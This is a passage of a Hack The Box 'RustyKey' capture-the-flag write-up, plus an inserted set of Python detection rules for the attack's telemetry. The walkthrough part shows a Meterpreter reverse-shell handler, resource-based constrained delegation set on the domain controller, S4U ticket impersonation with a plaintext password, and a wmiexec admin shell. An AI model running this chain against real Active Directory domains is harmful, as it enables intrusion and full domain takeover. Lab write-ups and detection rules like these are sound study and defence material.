└─# msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.16.xx; set LPORT 4444; exploit"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
LHOST => 10.10.16.xx
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.xx:4444
[*] Sending stage (203846 bytes) to 10.10.xx.xx
[*] Meterpreter session 1 opened (10.10.16.xx:4444 -> 10.10.xx.xx:51084) at 2025-07-01 02:40:22 +0800

meterpreter > shell


Process 1172 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows>Powershell
Powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
PS C:\Windows>

This works because, as BloodHound showed, MM.TURNER has the AddAllowedToAct privilege on DC.RUSTYKEY.HTB.
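The chain so far leaves a distinct trail in Windows telemetry: a computer account adding itself to HELPDESK and resetting user passwords, the IT and SUPPORT groups being pulled out of Protected Objects, a CLSID InprocServer32 default value repointed at a DLL under C:\Tools, and msDS-AllowedToActOnBehalfOfOtherIdentity being written on the DC object. The detection rules below are an added example (not from the write-up or any tool it uses); the event records are constructed, the Event IDs and field names are the standard Security-log and Sysmon ones, and the trusted DLL directories and watched group names are assumptions for this example.

```python
#!/usr/bin/env python3
"""Detection rules for the RustyKey escalation chain (added example; not code from
the write-up or from any tool it uses).

Each rule takes one normalized event (a dict of Security-log or Sysmon fields) and
returns a finding string, or None. SAMPLE_EVENTS are constructed to mirror the
write-up's steps; they are not real log records.
"""
import re
from typing import Callable, List, Optional

# Sysmon names a key's default value "(Default)"; match any CLSID's InprocServer32 default.
CLSID_INPROC = re.compile(
    r"\\Classes\\CLSID\\\{[0-9A-F-]{36}\}\\InprocServer32\\\(Default\)$", re.I)
# Where COM server DLLs are expected to live (assumption for this example).
TRUSTED_DLL_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Groups whose membership must not change outside a controlled process (assumption).
WATCHED_GROUPS = {"protected objects", "helpdesk"}
GROUP_ADD = {4728, 4732, 4756}      # member added to global / local / universal group
GROUP_REMOVE = {4729, 4733, 4757}   # member removed from global / local / universal group


def is_machine_account(name: str) -> bool:
    return name.endswith("$")


def rule_com_hijack(ev: dict) -> Optional[str]:
    """Sysmon 13 (registry value set): CLSID InprocServer32 repointed outside trusted dirs."""
    if ev.get("Source") != "Sysmon" or ev.get("EventID") != 13:
        return None
    target = ev.get("TargetObject", "")
    dll = ev.get("Details", "").strip('"').lower()
    if CLSID_INPROC.search(target) and not dll.startswith(TRUSTED_DLL_DIRS):
        return f"COM hijack: {target} -> {dll} (by {ev.get('User')})"
    return None


def rule_rbcd_on_dc(ev: dict) -> Optional[str]:
    """Security 5136 (directory object modified): RBCD attribute written on a DC object."""
    if ev.get("EventID") != 5136:
        return None
    attr = ev.get("AttributeLDAPDisplayName", "").lower()
    dn = ev.get("ObjectDN", "")
    if attr == "msds-allowedtoactonbehalfofotheridentity" and "ou=domain controllers" in dn.lower():
        return f"RBCD configured on {dn} by {ev.get('SubjectUserName')}"
    return None


def rule_watched_group_change(ev: dict) -> Optional[str]:
    """Security 4728/4729, 4732/4733, 4756/4757: membership change of a watched group."""
    eid = ev.get("EventID")
    if eid not in GROUP_ADD | GROUP_REMOVE:
        return None
    group = ev.get("TargetUserName", "")          # for these events the group is the target
    if group.lower() in WATCHED_GROUPS:
        verb = "added to" if eid in GROUP_ADD else "removed from"
        return f"{ev.get('MemberName')} {verb} {group} by {ev.get('SubjectUserName')}"
    return None


def rule_machine_resets_user_password(ev: dict) -> Optional[str]:
    """Security 4724 (password reset attempt): a computer account resetting a user's password."""
    if ev.get("EventID") != 4724:
        return None
    actor, target = ev.get("SubjectUserName", ""), ev.get("TargetUserName", "")
    if is_machine_account(actor) and not is_machine_account(target):
        return f"password of {target} reset by machine account {actor}"
    return None


RULES: List[Callable[[dict], Optional[str]]] = [
    rule_com_hijack, rule_rbcd_on_dc, rule_watched_group_change, rule_machine_resets_user_password,
]


def scan(events: List[dict]) -> List[str]:
    """Run every rule over every event and return the findings in event order."""
    return [f for ev in events for rule in RULES if (f := rule(ev))]


# Constructed events following the write-up's steps (account names from the write-up,
# records invented here); the last two are benign noise the rules must ignore.
SAMPLE_EVENTS = [
    {"EventID": 4728, "SubjectUserName": "IT-COMPUTER3$", "TargetUserName": "HELPDESK",
     "MemberName": "CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb"},
    {"EventID": 4724, "SubjectUserName": "IT-COMPUTER3$", "TargetUserName": "bb.morgan"},
    {"EventID": 4729, "SubjectUserName": "IT-COMPUTER3$", "TargetUserName": "Protected Objects",
     "MemberName": "CN=IT,CN=Users,DC=rustykey,DC=htb"},          # constructed group DN
    {"Source": "Sysmon", "EventID": 13, "User": "RUSTYKEY\\ee.reed",
     "TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}"
                     r"\InprocServer32\(Default)",
     "Details": r"C:\Tools\rev.dll"},
    {"EventID": 5136, "SubjectUserName": "mm.turner",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"EventID": 4724, "SubjectUserName": "Administrator", "TargetUserName": "nn.marcos"},
    {"Source": "Sysmon", "EventID": 13, "User": "NT AUTHORITY\\SYSTEM",
     "TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}"
                     r"\InprocServer32\(Default)",                 # constructed CLSID
     "Details": r"C:\Windows\System32\combase.dll"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print("[!]", finding)
```

Feeding real 5136 events requires the "Audit Directory Service Changes" subcategory plus a SACL on the DC computer objects, and the Sysmon rule needs registry value-set events for HKLM\SOFTWARE\Classes\CLSID in the Sysmon configuration.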

8. Privilege Escalation
We impersonate the domain admin account via S4U2Self and S4U2Proxy (resource-based constrained delegation).


┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# impacket-getST -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.xx.xx -k 'RUSTYKEY.HTB/IT-COMPUTER3$:Rusty88!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...


[*] Getting TGT for user
[*] Impersonating backupadmin
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin@[email protected].ccache


┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache

It seems the ESC1 technique could be used as an alternative to DCSync (Mimikatz). But here I just run wmiexec.py to get a shell as NT/SYSTEM and grab the root flag.


┌──(root㉿kali)-[/home/kali/Desktop/RustyKey]
└─# /usr/share/doc/python3-impacket/examples/wmiexec.py -k -no-pass 'RUSTYKEY.HTB/[email protected]'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used


[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
rustykey\backupadmin

C:\>dir
Volume in drive C has no label.
Volume Serial Number is 00BA-0DBE

Directory of C:\

06/05/2025  07:54 AM    <DIR>          inetpub
11/05/2022  12:03 PM    <DIR>          PerfLogs
12/26/2024  09:24 PM    <DIR>          Program Files
09/15/2018  02:08 AM    <DIR>          Program Files (x86)
06/30/2025  11:46 AM    <DIR>          Tools
06/30/2025  11:09 AM    <DIR>          Users
06/30/2025  11:59 AM    <DIR>          Windows
               0 File(s)              0 bytes
               7 Dir(s)   2,935,005,184 bytes free

C:\>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 00BA-0DBE

Directory of C:\Users\Administrator\Desktop

06/24/2025  10:00 AM    <DIR>          .
06/24/2025  10:00 AM    <DIR>          ..
06/30/2025  10:53 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,935,820,288 bytes free

C:\Users\Administrator\Desktop>
